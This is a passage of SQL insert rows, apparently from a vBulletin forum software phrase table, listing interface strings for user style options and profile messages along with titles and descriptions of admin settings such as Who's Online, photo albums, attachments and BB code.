(38741, -1, 'usercss_font_size', 'user', 'Font Size', 'vbulletin', 'vBulletin Solutions', 1191862131, '3.7.0 Beta 1'),
(38742, -1, 'usercss_font_tahoma', 'user', 'Tahoma', 'vbulletin', 'vBulletin Solutions', 1196182195, '3.7.0 Beta 1'),
(38743, -1, 'usercss_font_times_new_roman', 'user', 'Times New Roman', 'vbulletin', 'vBulletin Solutions', 1196182515, '3.7.0 Beta 1'),
(38744, -1, 'usercss_font_trebuchet_ms', 'user', 'Trebuchet MS', 'vbulletin', 'vBulletin Solutions', 1196182251, '3.7.0 Beta 1'),
(38745, -1, 'usercss_font_verdana', 'user', 'Verdana', 'vbulletin', 'vBulletin Solutions', 1196182271, '3.7.0 Beta 1'),
(38746, -1, 'usercss_fontsize_large', 'user', 'Large', 'vbulletin', 'vBulletin Solutions', 1196182289, '3.7.0 Beta 1'),
(38747, -1, 'usercss_fontsize_medium', 'user', 'Medium', 'vbulletin', 'vBulletin Solutions', 1196182299, '3.7.0 Beta 1'),
(38748, -1, 'usercss_fontsize_small', 'user', 'Small', 'vbulletin', 'vBulletin Solutions', 1196182309, '3.7.0 Beta 1'),
(38749, -1, 'usercss_inputs', 'user', 'Controls', 'vbulletin', 'vBulletin Solutions', 1197551855, '3.7.0 Beta 1'),
(38750, -1, 'usercss_inputs_desc', 'user', 'These include text boxes, buttons, pop-up menus, checkboxes etc.', 'vbulletin', 'vBulletin Solutions', 1197551891, '3.7.0 Beta 1'),
(38751, -1, 'usercss_linkcolor', 'user', 'Hyperlink Color', 'vbulletin', 'vBulletin Solutions', 1195049917, '3.7.0 Beta 1'),
(38752, -1, 'usercss_main', 'user', 'Main', 'vbulletin', 'vBulletin Solutions', 1192021594, '3.7.0 Beta 1'),
(38753, -1, 'usercss_normaltext', 'user', 'Normal Text', 'vbulletin', 'vBulletin Solutions', 1192020258, '3.7.0 Beta 1'),
(38754, -1, 'usercss_padding', 'user', 'Padding', 'vbulletin', 'vBulletin Solutions', 1195046308, '3.7.0 Beta 1'),
(38755, -1, 'usercss_padding_gargantuan', 'user', 'Gargantuan', 'vbulletin', 'vBulletin Solutions', 1196182411, '3.7.0 Beta 1'),
(38756, -1, 'usercss_padding_huge', 'user', 'Huge', 'vbulletin', 'vBulletin Solutions', 1196182427, '3.7.0 Beta 1'),
(38757, -1, 'usercss_padding_large', 'user', 'Large', 'vbulletin', 'vBulletin Solutions', 1196182434, '3.7.0 Beta 1'),
(38758, -1, 'usercss_padding_medium', 'user', 'Medium', 'vbulletin', 'vBulletin Solutions', 1196182441, '3.7.0 Beta 1'),
(38759, -1, 'usercss_padding_none', 'user', 'None', 'vbulletin', 'vBulletin Solutions', 1196182448, '3.7.0 Beta 1'),
(38760, -1, 'usercss_padding_small', 'user', 'Small', 'vbulletin', 'vBulletin Solutions', 1196182454, '3.7.0 Beta 1'),
(38761, -1, 'usercss_padding_tiny', 'user', 'Tiny', 'vbulletin', 'vBulletin Solutions', 1196182461, '3.7.0 Beta 1'),
(38762, -1, 'usercss_panel', 'user', 'Panel', 'vbulletin', 'vBulletin Solutions', 1192021554, '3.7.0 Beta 1'),
(38763, -1, 'usercss_panelsurround', 'user', 'Panel Surround', 'vbulletin', 'vBulletin Solutions', 1192021573, '3.7.0 Beta 1'),
(38764, -1, 'usercss_repeat_no_repeat', 'user', 'None', 'vbulletin', 'vBulletin Solutions', 1196176567, '3.7.0 Beta 1'),
(38765, -1, 'usercss_repeat_repeat', 'user', 'Both', 'vbulletin', 'vBulletin Solutions', 1196176573, '3.7.0 Beta 1'),
(38766, -1, 'usercss_repeat_repeat_x', 'user', 'Horizontal', 'vbulletin', 'vBulletin Solutions', 1196176581, '3.7.0 Beta 1'),
(38767, -1, 'usercss_repeat_repeat_y', 'user', 'Vertical', 'vbulletin', 'vBulletin Solutions', 1196176586, '3.7.0 Beta 1'),
(38768, -1, 'usercss_shadecolor', 'user', 'Shaded Text Color', 'vbulletin', 'vBulletin Solutions', 1195049932, '3.7.0 Beta 1'),
(38769, -1, 'usercss_smalltext', 'user', 'Small Text', 'vbulletin', 'vBulletin Solutions', 1192020274, '3.7.0 Beta 1'),
(38770, -1, 'usercss_tableborder', 'user', 'Block Borders', 'vbulletin', 'vBulletin Solutions', 1197552392, '3.7.0 Beta 1'),
(38771, -1, 'usercss_tableborder_desc', 'user', 'If you customize this, you should explicitly set background colors for both major and minor block headers.', 'vbulletin', 'vBulletin Solutions', 1197552496, '3.7.0 Beta 1'),
(38772, -1, 'usercss_tablefooter', 'user', 'Block Footers', 'vbulletin', 'vBulletin Solutions', 1197552440, '3.7.0 Beta 1'),
(38773, -1, 'usercss_tablefooter_desc', 'user', 'Some but not all blocks may have an additional bar at the bottom containing buttons etc.', 'vbulletin', 'vBulletin Solutions', 1197551437, '3.7.0 Beta 1'),
(38774, -1, 'usercss_tableheader', 'user', 'Minor Block Headers', 'vbulletin', 'vBulletin Solutions', 1197552409, '3.7.0 Beta 1'),
(38775, -1, 'usercss_tabletitle', 'user', 'Major Block Headers', 'vbulletin', 'vBulletin Solutions', 1197552421, '3.7.0 Beta 1'),
(38776, -1, 'userlist_filter_tooltip', 'user', 'Enter text here to filter search results below to only show users whose names contain your search text.', 'vbulletin', 'vBulletin Solutions', 1213105465, '3.8.0 Alpha 1'),
(38777, -1, 'vcard', 'user', 'vCard', 'vbulletin', 'vBulletin Solutions', 1196708213, '3.7.0 Beta 1'),
(38778, -1, 'view_all_subscribed_discussions', 'user', 'View all Subscribed Discussions', 'vbulletin', 'vBulletin Solutions', 1213877968, '3.7.1'),
(38779, -1, 'view_all_unread_private_messages', 'user', 'View All Unread Private Messages', 'vbulletin', 'vBulletin Solutions', 1208795183, '3.7.0 Release Candidate 4'),
(38780, -1, 'view_comments_awaiting_approval', 'user', 'View Comments Awaiting Approval', 'vbulletin', 'vBulletin Solutions', 1200332667, '3.7.0 Beta 4'),
(38781, -1, 'view_complete_members_list', 'user', 'To view the complete members list, click here .', 'vbulletin', '', 0, ''),
(38782, -1, 'view_conversation', 'user', 'View Conversation', 'vbulletin', 'vBulletin Solutions', 1202925436, '3.7.0 Beta 5'),
(38783, -1, 'view_conversation_between_x_and_y', 'user', 'View Conversation Between {1} and {2}', 'vbulletin', 'vBulletin Solutions', 1203692338, '3.7.0 Beta 6'),
(38784, -1, 'view_group_invitations', 'user', 'View Group Invitations', 'vbulletin', 'vBulletin Solutions', 1196949404, '3.7.0 Beta 1'),
(38785, -1, 'view_group_requests', 'user', 'View requests to join your groups', 'vbulletin', 'vBulletin Solutions', 1197300395, '3.7.0 Beta 1'),
(38786, -1, 'view_requests', 'user', 'View Requests', 'vbulletin', '', 0, ''),
(38787, -1, 'view_unread_comments', 'user', 'View Unread Comments', 'vbulletin', 'vBulletin Solutions', 1200332650, '3.7.0 Beta 4'),
(38788, -1, 'view_your_about_me', 'user', 'View your \"About Me\" as seen by everyone else', 'vbulletin', 'vBulletin Solutions', 1204841633, '3.7.0 Beta 6'),
(38789, -1, 'view_your_conversation_with_x', 'user', 'View Your Conversation with {1}', 'vbulletin', 'vBulletin Solutions', 1203690077, '3.7.0 Beta 6'),
(38790, -1, 'visible_post_elements', 'user', 'Visible Post Elements', 'vbulletin', '', 0, ''),
(38791, -1, 'visit_xs_homepage', 'user', 'Visit {1}\'s homepage!', 'vbulletin', '', 0, ''),
(38792, -1, 'visitor_message', 'user', 'Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197370652, '3.7.0 Beta 1'),
(38793, -1, 'visitor_messages_for_x', 'user', 'Visitor Messages for {1}', 'vbulletin', 'vBulletin Solutions', 1197370663, '3.7.0 Beta 1'),
(38794, -1, 'visitor_messaging', 'user', 'Visitor Messaging', 'vbulletin', 'vBulletin Solutions', 1203119160, '3.7.0 Beta 6'),
(38795, -1, 'weekly', 'user', 'Weekly', 'vbulletin', '', 0, ''),
(38796, -1, 'x_and_y_more', 'user', '{1} and {2} more', 'vbulletin', 'vBulletin Solutions', 1196869244, '3.7.0 Beta 1'),
(38797, -1, 'x_avatars', 'user', '{1} avatars', 'vbulletin', '', 0, ''),
(38798, -1, 'x_has_invalid_properties', 'user', '{2} has invalid properties', 'vbulletin', 'vBulletin Solutions', 1192105135, '3.7.0 Beta 1'),
(38799, -1, 'x_has_no_contact_info', 'user', '{1} has no contact information.', 'vbulletin', '', 0, ''),
(38800, -1, 'x_has_no_visitor_messages', 'user', '{1} has not received any visitor messages.', 'vbulletin', 'vBulletin Solutions', 1197370680, '3.7.0 Beta 1'),
(38801, -1, 'x_has_not_created_any_albums', 'user', '{1} has not created any Albums', 'vbulletin', 'vBulletin Solutions', 1194366858, '3.7.0 Beta 1'),
(38802, -1, 'x_has_not_made_any_friends_yet', 'user', '{1} has not made any friends yet', 'vbulletin', 'vBulletin Solutions', 1200666285, '3.7.0 Beta 4'),
(38803, -1, 'x_is_not_a_member_of_any_public_groups', 'user', '{1} is not a member of any public groups', 'vbulletin', '', 0, ''),
(38804, -1, 'x_moderated_pictures', 'user', '{1} Moderated Picture(s)', 'vbulletin', 'vBulletin Solutions', 1203660565, '3.7.0 Beta 6'),
(38805, -1, 'x_points_total', 'user', '{1} point(s) total', 'vbulletin', 'vBulletin Solutions', 1149791681, '3.6.0 Beta 2'),
(38806, -1, 'x_posts_per_day', 'user', '{1} posts per day', 'vbulletin', '', 0, ''),
(38807, -1, 'xs_avatar', 'user', '{1}\'s Avatar', 'vbulletin', '', 0, ''),
(38808, -1, 'xs_picture', 'user', '{1}\'s Profile Picture', 'vbulletin', 'vBulletin Solutions', 1167178130, '3.6.5'),
(38809, -1, 'xs_profile', 'user', '{1}\'s Profile', 'vbulletin', 'vBulletin Solutions', 1192531078, '3.7.0 Beta 1'),
(38810, -1, 'yahoo_messenger_handle', 'user', 'Yahoo! Messenger Handle', 'vbulletin', '', 0, ''),
(38811, -1, 'year_optional', 'user', 'Year (Optional)', 'vbulletin', '', 0, ''),
(38812, -1, 'you_have_no_attachments', 'user', 'You have no attachments.', 'vbulletin', 'vBulletin Solutions', 1216721064, '3.8.0 Alpha 1'),
(38813, -1, 'you_have_not_created_any_albums', 'user', 'You have not created any albums', 'vbulletin', 'vBulletin Solutions', 1197558350, '3.7.0 Beta 1'),
(38814, -1, 'you_have_pending_friend_requests_from_x', 'user', 'You have pending friend requests from {1}.', 'vbulletin', 'vBulletin Solutions', 1196767682, '3.7.0 Beta 1'),
(38815, -1, 'you_have_pending_friend_requests_from_x_and_y_more', 'user', 'You have pending friend requests from {1} and {2} others.', 'vbulletin', 'vBulletin Solutions', 1196767727, '3.7.0 Beta 1'),
(38816, -1, 'you_have_x_picture_comments_awaiting_approval', 'user', 'You have {1} picture comment(s) awaiting approval.', 'vbulletin', 'vBulletin Solutions', 1200331665, '3.7.0 Beta 4'),
(38817, -1, 'you_have_x_unread_picture_comments', 'user', 'You have {1} unread picture comment(s).', 'vbulletin', 'vBulletin Solutions', 1200331623, '3.7.0 Beta 4'),
(38818, -1, 'you_leader_following_groups', 'user', 'You are a leader of the following groups', 'vbulletin', '', 0, ''),
(38819, -1, 'you_lost_activation_code_or_username', 'user', 'If you have lost your activation code or you have forgotten your username,click here to have the codes emailed to you again.', 'vbulletin', '', 0, ''),
(38820, -1, 'you_not_member_any_groups', 'user', 'You are not a member of any groups', 'vbulletin', 'vBulletin Solutions', 1197558988, '3.7.0 Beta 1'),
(38821, -1, 'your_contacts', 'user', 'Your Contacts', 'vbulletin', 'vBulletin Solutions', 1215097206, '3.8.0 Alpha 1'),
(38822, -1, 'your_control_panel', 'user', 'Your Control Panel', 'vbulletin', 'vBulletin Solutions', 1197893852, '3.7.0 Beta 2'),
(38823, -1, 'your_current_avatar', 'user', 'Your Current Avatar', 'vbulletin', '', 0, ''),
(38824, -1, 'your_current_profile_picture', 'user', 'Your Current Profile Picture', 'vbulletin', '', 0, ''),
(38825, -1, 'your_current_signature_picture', 'user', 'Your Current Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38826, -1, 'your_current_user_title_is', 'user', 'Your current user title is', 'vbulletin', '', 0, ''),
(38827, -1, 'your_date_of_birth', 'user', 'Your date of birth and age are displayed in several places on the forum. Only the administrator will have access to your date of birth should you choose to hide it via the privacy option below.', 'vbulletin', '', 0, ''),
(38828, -1, 'your_friends', 'user', 'Your Friends', 'vbulletin', 'vBulletin Solutions', 1215094742, '3.8.0 Alpha 1'),
(38829, -1, 'your_friends_list_is_empty', 'user', 'Your friends list is empty', 'vbulletin', 'vBulletin Solutions', 1197938043, '3.7.0 Beta 3'),
(38830, -1, 'your_profile_picture', 'user', 'Your Profile Picture', 'vbulletin', '', 0, ''),
(38831, -1, 'your_signature', 'user', 'Your Signature', 'vbulletin', '', 0, ''),
(38832, -1, 'setting_WOLenable_desc', 'vbsettings', 'Selecting \'No\' will disable Who\'s Online for everyone.', 'vbulletin', '', 0, ''),
(38833, -1, 'setting_WOLenable_title', 'vbsettings', 'Who\'s Online Enabled', 'vbulletin', '', 0, ''),
(38834, -1, 'setting_WOLguests_desc', 'vbsettings', 'Display Guest (non-registered user) activity on Who\'s Online?', 'vbulletin', '', 0, ''),
(38835, -1, 'setting_WOLguests_title', 'vbsettings', 'Who\'s Online Display Guests', 'vbulletin', '', 0, ''),
(38836, -1, 'setting_WOLrefresh_desc', 'vbsettings', 'Time period in seconds to refresh the Who\'s Online display. \r\n \r\nA value of 0 disables the auto-refresh.', 'vbulletin', 'vBulletin Solutions', 1199365927, '3.7.0 Beta 4'),
(38837, -1, 'setting_WOLrefresh_title', 'vbsettings', 'Who\'s Online Refresh Period', 'vbulletin', 'vBulletin Solutions', 1199365927, '3.7.0 Beta 4'),
(38838, -1, 'setting_WOLresolve_desc', 'vbsettings', 'Resolve IP addresses for those who have access to view them? \r\n \r\nThis can dramatically slow down the Display of Who\'s Online.', 'vbulletin', '', 0, ''),
(38839, -1, 'setting_WOLresolve_title', 'vbsettings', 'Who\'s Online Resolve IP Addresses', 'vbulletin', '', 0, ''),
(38840, -1, 'setting_activememberdays_desc', 'vbsettings', 'Enter a number of days here that represents a threshold for \'active\' members. If a user has visited the board within the past number of days you specify, they are considered \'active\'. \r\n \r\nEnter \'0\' to treat all members as \'active\'.', 'vbulletin', '', 0, ''),
(38841, -1, 'setting_activememberdays_title', 'vbsettings', 'Active Members Time Cut-Off', 'vbulletin', '', 0, ''),
(38842, -1, 'setting_activememberoptions_desc', 'vbsettings', 'Using the boxes here, you can choose to show only birthdays for those members considered \'active\', and to show or hide the total number of \'active\' members. \r\n \r\nA member is considered \'active\' if they have visited the board within the number of days specified in \'Active Members Time Cut-Off\'.', 'vbulletin', '', 0, ''),
(38843, -1, 'setting_activememberoptions_title', 'vbsettings', 'Active Members Options', 'vbulletin', '', 0, ''),
(38844, -1, 'setting_addheaders_desc', 'vbsettings', 'This option does not work with some combinations of web server, so it is off by default. However, some IIS setups may need it turned on. \r\n \r\nIt will send the 200 OK HTTP headers if turned on.', 'vbulletin', 'vBulletin Solutions', 1150192029, '3.6.0 Beta 2'),
(38845, -1, 'setting_addheaders_title', 'vbsettings', 'Add Standard HTTP Headers', 'vbulletin', '', 0, ''),
(38846, -1, 'setting_addpolltimeout_desc', 'vbsettings', 'Specify the time-limit (in minutes) within which the thread may have a poll added to it.', 'vbulletin', '', 0, ''),
(38847, -1, 'setting_addpolltimeout_title', 'vbsettings', 'Time Limit on Adding a Poll to a Thread', 'vbulletin', '', 0, ''),
(38848, -1, 'setting_address_desc', 'vbsettings', 'Address of your company. COPPA forms will be posted to this address.', 'vbulletin', '', 0, ''),
(38849, -1, 'setting_address_title', 'vbsettings', 'Company Address', 'vbulletin', '', 0, ''),
(38850, -1, 'setting_addtemplatename_desc', 'vbsettings', 'Add the template name at the beginning and end of every template rendered. This is useful for debugging and analyzing the HTML code, but turn it off to save bandwidth when running in a production environment.', 'vbulletin', '', 0, ''),
(38851, -1, 'setting_addtemplatename_title', 'vbsettings', 'Add Template Name in HTML Comments', 'vbulletin', '', 0, ''),
(38852, -1, 'setting_adminpower_desc', 'vbsettings', 'How many reputation points does an administrator give or take away with each click? \r\n Set to 0 to have administrators follow the same rules as everyone else.', 'vbulletin', '', 0, ''),
(38853, -1, 'setting_adminpower_title', 'vbsettings', 'Administrator\'s Reputation Power', 'vbulletin', '', 0, ''),
(38854, -1, 'setting_adminquickstats_desc', 'vbsettings', 'Display additional \'Quick Stats\' on the main index page of the Admin Control Panel? Displaying these statistics may cause a performance issue on large boards.', 'vbulletin', 'vBulletin Solutions', 1216205558, '3.8.0 Alpha 1'),
(38855, -1, 'setting_adminquickstats_title', 'vbsettings', 'Control Panel Quick Statistics', 'vbulletin', '', 0, ''),
(38856, -1, 'setting_aggressiveemailban_desc', 'vbsettings', 'If this option is enabled, when checking for banned emails, incomplete addresses are matched anywhere in the email address, not just the end. \r\n \r\nFor example, if this option is enabled \'yahoo\' will block any email address with \'yahoo\' in it. If this option is disabled, no emails will be banned unless the ban was changed to \'yahoo.com\'.', 'vbulletin', 'vBulletin Solutions', 1205425337, '3.7.0 Release Candidate 1'),
(38857, -1, 'setting_aggressiveemailban_title', 'vbsettings', 'Aggressive Email Banning', 'vbulletin', 'vBulletin Solutions', 1205425337, '3.7.0 Release Candidate 1'),
(38858, -1, 'setting_album_captionpreviewlen_desc', 'vbsettings', 'The amount of characters from a picture\'s caption that will be shown when a user hovers over the picture.', 'vbulletin', 'vBulletin Solutions', 1199365091, '3.7.0 Beta 4'),
(38859, -1, 'setting_album_captionpreviewlen_title', 'vbsettings', 'Caption Preview Length', 'vbulletin', 'vBulletin Solutions', 1199365091, '3.7.0 Beta 4'),
(38860, -1, 'setting_album_dataloc_desc', 'vbsettings', '', 'vbulletin', 'vBulletin Solutions', 1192198430, '3.7.0 Beta 1'),
(38861, -1, 'setting_album_dataloc_title', 'vbsettings', 'Album Data Location', 'vbulletin', 'vBulletin Solutions', 1192198430, '3.7.0 Beta 1'),
(38862, -1, 'setting_album_maxpicsperalbum_desc', 'vbsettings', 'You may choose to limit the number of pictures that a user can have in one album. This is primarily useful for encouraging your users to have albums for smaller topics, but it does have minor performance considerations as well. \r\n \r\nSet this to 0 to disable the limit.', 'vbulletin', 'vBulletin Solutions', 1199365101, '3.7.0 Beta 4'),
(38863, -1, 'setting_album_maxpicsperalbum_title', 'vbsettings', 'Maximum Pictures per Album', 'vbulletin', 'vBulletin Solutions', 1199365101, '3.7.0 Beta 4'),
(38864, -1, 'setting_album_picpath_desc', 'vbsettings', '', 'vbulletin', 'vBulletin Solutions', 1192198452, '3.7.0 Beta 1'),
(38865, -1, 'setting_album_picpath_title', 'vbsettings', 'Album Full Picture Path', 'vbulletin', 'vBulletin Solutions', 1192198452, '3.7.0 Beta 1'),
(38866, -1, 'setting_album_pictures_perpage_desc', 'vbsettings', 'When viewing an album, this controls how many pictures are displayed before pagination occurs. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954878, '3.7.0 Release Candidate 4'),
(38867, -1, 'setting_album_pictures_perpage_title', 'vbsettings', 'Pictures Per Page', 'vbulletin', 'vBulletin Solutions', 1208954878, '3.7.0 Release Candidate 4'),
(38868, -1, 'setting_album_recentalbumdays_desc', 'vbsettings', 'You may set the amount of days that albums are relevant in the Recently Updated Albums list. You may want to increase this value if picture updates are infrequent, or vice versa.Note: If user album permissions are changed, the Recently Update Album list can be rebuilt with Rebuild Counters .\r\n\r\nIf you set this to 0, Recently Updated Albums will be disabled.', 'vbulletin', 'vBulletin Solutions', 1217340531, '3.8.0 Alpha 1'),
(38869, -1, 'setting_album_recentalbumdays_title', 'vbsettings', 'Recent Album Update Days', 'vbulletin', 'vBulletin Solutions', 1217340531, '3.8.0 Alpha 1'),
(38870, -1, 'setting_album_thumbpath_desc', 'vbsettings', '', 'vbulletin', 'vBulletin Solutions', 1192198462, '3.7.0 Beta 1'),
(38871, -1, 'setting_album_thumbpath_title', 'vbsettings', 'Album Thumbnail Path', 'vbulletin', 'vBulletin Solutions', 1192198462, '3.7.0 Beta 1'),
(38872, -1, 'setting_album_thumbsize_desc', 'vbsettings', 'The maximum height and width of thumbnails in the album system. Each picture\'s aspect ratio will be maintained when it is thumbnailed.', 'vbulletin', 'vBulletin Solutions', 1199365086, '3.7.0 Beta 4'),
(38873, -1, 'setting_album_thumbsize_title', 'vbsettings', 'Album Thumbnail Size', 'vbulletin', 'vBulletin Solutions', 1199365086, '3.7.0 Beta 4'),
(38874, -1, 'setting_album_thumburl_desc', 'vbsettings', '', 'vbulletin', 'vBulletin Solutions', 1192198474, '3.7.0 Beta 1'),
(38875, -1, 'setting_album_thumburl_title', 'vbsettings', 'Album Thumbnail URL', 'vbulletin', 'vBulletin Solutions', 1192198474, '3.7.0 Beta 1'),
(38876, -1, 'setting_album_uploadamount_desc', 'vbsettings', 'This controls the number of pictures users can upload simultaneously. They will not be able to violate any album- or usergroup-implied size limits if you set this value too large.', 'vbulletin', 'vBulletin Solutions', 1199365097, '3.7.0 Beta 4'),
(38877, -1, 'setting_album_uploadamount_title', 'vbsettings', 'Number of Pictures that can be Uploaded Simultaneously', 'vbulletin', 'vBulletin Solutions', 1199365097, '3.7.0 Beta 4'),
(38878, -1, 'setting_albums_perpage_desc', 'vbsettings', 'When listing multiple albums on one page, this controls how many will be displayed before pagination occurs. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954887, '3.7.0 Release Candidate 4'),
(38879, -1, 'setting_albums_perpage_title', 'vbsettings', 'Albums Per Page', 'vbulletin', 'vBulletin Solutions', 1208954887, '3.7.0 Release Candidate 4'),
(38880, -1, 'setting_albums_pictures_moderation_desc', 'vbsettings', 'When enabled, all new pictures are placed into moderation. This can also be enabled in usergroup permissions.', 'vbulletin', 'vBulletin Solutions', 1203549783, '3.7.0 Beta 6'),
(38881, -1, 'setting_albums_pictures_moderation_title', 'vbsettings', 'Picture Moderation', 'vbulletin', 'vBulletin Solutions', 1203549783, '3.7.0 Beta 6'),
(38882, -1, 'setting_allowattachdel_desc', 'vbsettings', 'Allow users to delete attachments, even if the post edit time limit has been exceeded? If you have attachment quotas enabled then you will need this option enabled to allow users to delete attachments once they reach their quota. The user will still need permission to edit posts in the forum for this to apply.', 'vbulletin', '', 0, ''),
(38883, -1, 'setting_allowattachdel_title', 'vbsettings', 'Allow Deletion of Attachments Beyond Edit Time Limit', 'vbulletin', '', 0, ''),
(38884, -1, 'setting_allowbbcode_desc', 'vbsettings', 'Allow users to include BB code in non-forum-specific areas? (Such as [b], [i] etc.)', 'vbulletin', 'vBulletin Solutions', 1206965535, '3.7.0 Release Candidate 2'),
(38885, -1, 'setting_allowbbcode_title', 'vbsettings', 'Allow BB Code in Non Forum Specific Areas', 'vbulletin', 'vBulletin Solutions', 1195475585, '3.7.0 Beta 1'),
(38886, -1, 'setting_allowbbimagecode_desc', 'vbsettings', 'Allow users to include [IMG] codes in Non Forum Specific Areas?', 'vbulletin', 'vBulletin Solutions', 1195216721, '3.7.0 Beta 1'),
(38887, -1, 'setting_allowbbimagecode_title', 'vbsettings', 'Allow [IMG] Code in Non Forum Specific Areas', 'vbulletin', 'vBulletin Solutions', 1195216721, '3.7.0 Beta 1'),
(38888, -1, 'setting_allowchangestyles_desc', 'vbsettings', 'This allows users to set their preferred style set on registration or when editing their option. Setting this to \'No\' disables that option and will force them to use whatever style has been specified.', 'vbulletin', '', 0, ''),
(38889, -1, 'setting_allowchangestyles_title', 'vbsettings', 'Allow Users To Change Styles', 'vbulletin', '', 0, ''),
(38890, -1, 'setting_allowclosedattachdel_desc', 'vbsettings', 'Allow users to delete attachments from threads that are closed? If you have attachment quotas enabled then you might need this option enabled to allow users to delete attachments once they reach their quota. The user will still need permission to edit posts in the forum for this to apply. If the above option is set to NO then this option will only apply up to the edit time limit setting.', 'vbulletin', '', 0, ''),
(38891, -1, 'setting_allowclosedattachdel_title', 'vbsettings', 'Allow Deletion of Attachments in Closed Threads', 'vbulletin', '', 0, ''),
(38892, -1, 'setting_allowduplicates_desc', 'vbsettings', 'This setting only checks for attachments posted by the user that is making the post.', 'vbulletin', '', 0, ''),
(38893, -1, 'setting_allowduplicates_title', 'vbsettings', 'Allow Duplicate Attached Images', 'vbulletin', '', 0, ''),
(38894, -1, 'setting_allowedbbcodes_desc', 'vbsettings', 'This setting allows you to enable and disable various built-in BB code tags in vBulletin. \r\n \r\nDisabling a BB code tag will prevent it from working anywhere on the forum, including signatures, private messages, user notes etc.', 'vbulletin', 'vBulletin Solutions', 1206965501, '3.7.0 Release Candidate 2'),
(38895, -1, 'setting_allowedbbcodes_title', 'vbsettings', 'Enabled Built-in BB Code Tags', 'vbulletin', 'vBulletin Solutions', 1206965550, '3.7.0 Release Candidate 2'),
(38896, -1, 'setting_allowedreferrers_desc', 'vbsettings', 'For security purposes, vBulletin only allows data to be submitted via post from within the domain the board is installed on. If you are submitting post requests from a different domain or subdomain, you must add them here.\r\n \r\nEnter domains in the form of .domain.com (including the leading dot). Separate multiple domains by line breaks.', 'vbulletin', 'vBulletin Solutions', 1156504505, '3.6.1'),
(38897, -1, 'setting_allowedreferrers_title', 'vbsettings', 'Post Referrer Whitelist', 'vbulletin', '', 0, ''),
(38898, -1, 'setting_allowhtml_desc', 'vbsettings', 'Allow users to include raw HTML code in Non Forum Specific Areas? (Strongly not recommended. )', 'vbulletin', 'vBulletin Solutions', 1195216727, '3.7.0 Beta 1'),
(38899, -1, 'setting_allowhtml_title', 'vbsettings', 'Allow HTML in Non Forum Specific Areas', 'vbulletin', 'vBulletin Solutions', 1195216727, '3.7.0 Beta 1'),
(38900, -1, 'setting_allowkeepbannedemail_desc', 'vbsettings', 'If you ban an email address and a user already uses that address, a problem will occur. Using this option, you can specify whether the user will have to enter a new email address in their profile when they next modify their email address, or whether the user can just keep the email address which you have banned.', 'vbulletin', '', 0, ''),
(38901, -1, 'setting_allowkeepbannedemail_title', 'vbsettings', 'Allow User to Keep Banned Email Addresses', 'vbulletin', '', 0, ''),
(38902, -1, 'setting_allowmultiregs_desc', 'vbsettings', 'Normally, vBulletin will stop users signing up for multiple names by checking for a cookie on the user\'s machine. If one exists, then the user may not sign up for additional names. Note : This does not stop users from logging out and then registering new accounts. \r\n \r\nIf you wish to allow your users to sign up for multiple names, then select yes for this option, and they will not be blocked from registering additional usernames.', 'vbulletin', '', 0, ''),
(38903, -1, 'setting_allowmultiregs_title', 'vbsettings', 'Allow Multiple Registrations Per User', 'vbulletin', '', 0, ''),
(38904, -1, 'setting_allowphpinfo_desc', 'vbsettings', 'Setting this value to \'Yes\' will enable anyone to view your phpinfo() page by adding \'&do=phpinfo\' to the URL.', 'vbulletin', '', 0, ''),
(38905, -1, 'setting_allowphpinfo_title', 'vbsettings', 'Public phpinfo() Display Enabled', 'vbulletin', '', 0, ''),
(38906, -1, 'setting_allowregistration_desc', 'vbsettings', 'If you would like to temporarily (or permanently) prevent anyone new from registering, you can do so. Anyone attempting to register will be told that you are not accepting new registrations at this time.', 'vbulletin', '', 0, ''),
(38907, -1, 'setting_allowregistration_title', 'vbsettings', 'Allow New User Registrations', 'vbulletin', '', 0, ''),
(38908, -1, 'setting_allowsmilies_desc', 'vbsettings', 'Allow users to include smilies in Non Forum Specific Areas?', 'vbulletin', 'vBulletin Solutions', 1195216716, '3.7.0 Beta 1'),
(38909, -1, 'setting_allowsmilies_title', 'vbsettings', 'Allow Smilies in Non Forum Specific Areas', 'vbulletin', 'vBulletin Solutions', 1195216716, '3.7.0 Beta 1'),
(38910, -1, 'setting_allowthreadedmode_desc', 'vbsettings', 'Use this setting to enable or completely disable the Threaded and Hybrid thread display modes.', 'vbulletin', 'vBulletin Solutions', 1150976007, '3.6.0 Beta 4'),
(38911, -1, 'setting_allowthreadedmode_title', 'vbsettings', 'Enable Threaded / Hybrid Mode', 'vbulletin', 'vBulletin Solutions', 1150976007, '3.6.0 Beta 4'),
(38912, -1, 'setting_allowwildcards_desc', 'vbsettings', 'Allow users to use a star (*) in searches to match partial words? (Eg: \'bu*\' matches \'bu g\' and \'*bu*\' matches \'vBu lletin\').', 'vbulletin', 'vBulletin Solutions', 1185233710, '3.6.8'),
(38913, -1, 'setting_allowwildcards_title', 'vbsettings', 'Allow Search Wild Cards', 'vbulletin', 'vBulletin Solutions', 1185233710, '3.6.8'),
(38914, -1, 'setting_archive_postsperpage_desc', 'vbsettings', 'The number of posts to display per page in the thread listing. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954938, '3.7.0 Release Candidate 4'),
(38915, -1, 'setting_archive_postsperpage_title', 'vbsettings', 'Forum Archive Posts Per Page', 'vbulletin', 'vBulletin Solutions', 1208954938, '3.7.0 Release Candidate 4'),
(38916, -1, 'setting_archive_threadsperpage_desc', 'vbsettings', 'The number of threads to display per page in the threads listing. \r\nThis is done on a per-forum basis. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954928, '3.7.0 Release Candidate 4'),
(38917, -1, 'setting_archive_threadsperpage_title', 'vbsettings', 'Forum Archive Threads Per Page', 'vbulletin', 'vBulletin Solutions', 1208954928, '3.7.0 Release Candidate 4'),
(38918, -1, 'setting_archive_threadtype_desc', 'vbsettings', 'By default, threads in the Archive are displayed in a simple manner. Set this to no to have the real threads linked from the archive.', 'vbulletin', '', 0, ''),
(38919, -1, 'setting_archive_threadtype_title', 'vbsettings', 'Display Simple View of Threads', 'vbulletin', '', 0, ''),
